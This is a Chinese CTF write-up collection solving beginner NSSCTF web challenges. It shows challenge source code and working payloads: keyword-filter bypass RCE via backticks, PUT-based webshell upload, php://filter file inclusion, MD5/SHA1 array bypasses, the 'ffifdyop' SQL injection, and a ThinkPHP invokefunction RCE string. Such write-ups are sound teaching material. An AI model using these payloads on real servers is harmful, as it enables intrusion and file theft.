比较基础的一些web题⑤
[羊城杯 2020]easycon 访问Index.php 这道题一打开是这样的一个页面,感觉这题更偏向miscindex.html我们这里可以试着访问一下index.php
1 cmd=system("cat bbbbbbbbb.txt ");
然后得到一堆base64编码的东西,拿去解码在线网站 试试
Base64解码转图片 NSSCTF{do_u_kn0w_c@idao}
[UUCTF 2022 新生赛]ez_rce 打开是源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 居然都不输入参数,可恶!!!!!!!!! <?php ## 放弃把,小伙子,你真的不会RCE,何必在此纠结呢???????????? if(isset($_GET['code'])){ $code=$_GET['code']; if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){ echo '看看你输入的参数!!!不叫样子!!';echo '<br>'; eval($code); } else{ die("你想干什么?????????"); } } else{ echo "居然都不输入参数,可恶!!!!!!!!!"; show_source(__FILE__); }
看到过滤了很多执行命令的函数,这里我们可以用 反引号 执行命令然后用print回显出来进行绕过
关键词反斜杠绕过+反引号执行命令+Print回显+空格用+绕过 1 2 3 4 5 ?code=printf(`l\s`); ?code=printf(`l\s+/`); ?code=printf(`c\at+/fffffffffflagafag`); #这里的空格也可以用url编码的%20绕过,比如 ?code=printf(`c\at+/fffffffffflagafag`);
NSSCTF{This_IS_s0_easy_RCE}
[NSSRound#1 Basic]basic_check 打开啥都没有,来用dirsearch扫一波dirsearch -u http://node4.anna.nssctf.cn:28766/ -e* curl扫描一下
curl扫描
他允许PUT方法,而且PUT方法可以用来上传文件
PUT方法上传文件 然后抓包上传文件(可以先转换成POST方法,然后再手动改成PUT方法)
1 2 /111.php?sss=ls / /111.php?sss=cat /flag
NSSCTF{400c595f-164c-4127-bb02-edf0fb5e9c34}
[HNCTF 2022 Week1]easy_html 打开环境,提示看cookie,cookie中提示文件f14g.php,访问之后是一个登录框
绕过前端限制 NSSCTF{034f24bd-4def-42a2-8c97-a2111ad82b82}
[GDOUCTF 2023]受不了一点 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 <?php error_reporting(0); header("Content-type:text/html;charset=utf-8"); if(isset($_POST['gdou'])&&isset($_POST['ctf'])){ $b=$_POST['ctf']; $a=$_POST['gdou']; if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){ if(isset($_COOKIE['cookie'])){ if ($_COOKIE['cookie']=='j0k3r'){ if(isset($_GET['aaa']) && isset($_GET['bbb'])){ $aaa=$_GET['aaa']; $bbb=$_GET['bbb']; if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){ $give = 'cancanwordflag'; $get ='hacker!'; if(isset($_GET['flag']) && isset($_POST['flag'])){ die($give); } if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ die($get); } foreach ($_POST as $key => $value) { $$key = $value; } foreach ($_GET as $key => $value) { $$key = $$value; } echo $flag; }else{ echo "洗洗睡吧"; } }else{ echo "行不行啊细狗"; } } } else { echo '菜菜'; } }else{ echo "就这?"; } }else{ echo "别来沾边"; } ?> 别来沾边
数组比较,数字比较 1 2 3 4 5 6 #get传参 ?aaa=114514&bbb=114514a&1=flag&flag=1 #post传参 gdou[]=1&ctf[]=2 #cookie传参 cookie=j0k3r
NSSCTF{2bb0f907-3501-4451-9482-7996ef29a181}
[SWPUCTF 2022 新生赛]ez_ez_php(revenge) 源码为
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php error_reporting(0); if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 3) === "php" ) { echo "Nice!!!"; include($_GET["file"]); } else { echo "Hacker!!"; } }else { highlight_file(__FILE__); } //flag.php
伪协议 1 ?file=php://filter/read=covert,vase64-encode/resource=/flag
NSSCTF{9c292bd8-0bdd-481b-b810-38907f0b2246}
[SWPUCTF 2022 新生赛]奇妙的MD5 抓个包看一下
md5中神奇的字符-ffifdyop 经过md5加密后:276f722736c95d99e921722cf9ed621c'or'6<乱码> 即 'or'66�]��!r,��bselect * from admin where password=''or'6<乱码>',or后面的第一个字母只要不是0,都会被认为是true,从而实现sql注入的绕过select * from admin where password=''or 1 实现sql注入ffifdyop
1 x=s878926199a&y=s155964671a
最后一关
1 2 3 4 5 6 7 8 9 <?php error_reporting(0); include "flag.php"; highlight_file(__FILE__); if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){ echo $FLAG; }
md5强比较
NSSCTF{94ead189-4555-42ea-bb83-0580a4b4fa68}
[HNCTF 2022 Week1]easy_upload 直接一句话木马NSSCTF{1a845aba-d706-4c2c-901f-dbb11bb94e12}
[鹤城杯 2021]Middle magic 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 <?php highlight_file(__FILE__); include "./flag.php"; include "./result.php"; if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){ $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']); if(preg_match('/pass_the_level_1#/', $aaa)){ echo "here is level 2"; if (isset($_POST['admin']) and isset($_POST['root_pwd'])) { if ($_POST['admin'] == $_POST['root_pwd']) echo '<p>The level 2 can not pass!</p>'; // START FORM PROCESSING else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){ echo "here is level 3,do you kown how to overcome it?"; if (isset($_POST['level_3'])) { $level_3 = json_decode($_POST['level_3']); if ($level_3->result == $result) { echo "success:".$flag; } else { echo "you never beat me!"; } } else{ echo "out"; } } else{ die("no"); } // perform validations on the form data } else{ echo '<p>out!</p>'; } } else{ echo 'nonono!'; } echo '<hr>'; } ?>
首先正则,第一关必须为pass_the_level_1#
换行符绕过正则 直接换行绕过。.点号不会匹配换行符%0a%0apass_the_level_1%23
sha1强相等绕过–数组绕过 admin[]=1&root_pwd[]=2
第三关随便传入就行level_3={“result”:0}NSSCTF{41e5162c-2a22-48d7-8109-e20e2352a3da}
[HNCTF 2022 Week1]What is Web 直接f12NSSCTF{Hell0_Weber_Wec0m3_come_2_web_w0r1d!}
[SWPUCTF 2022 新生赛]ez_rce thinkphp历史漏洞 扫一下目录robots.txt/NSS/index.php/https://xz.aliyun.com/t/9361 ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /nss/ctf/flag/flagNSSCTF{c3da9ab0-00c3-4a2c-baf0-34f5b986aaae}
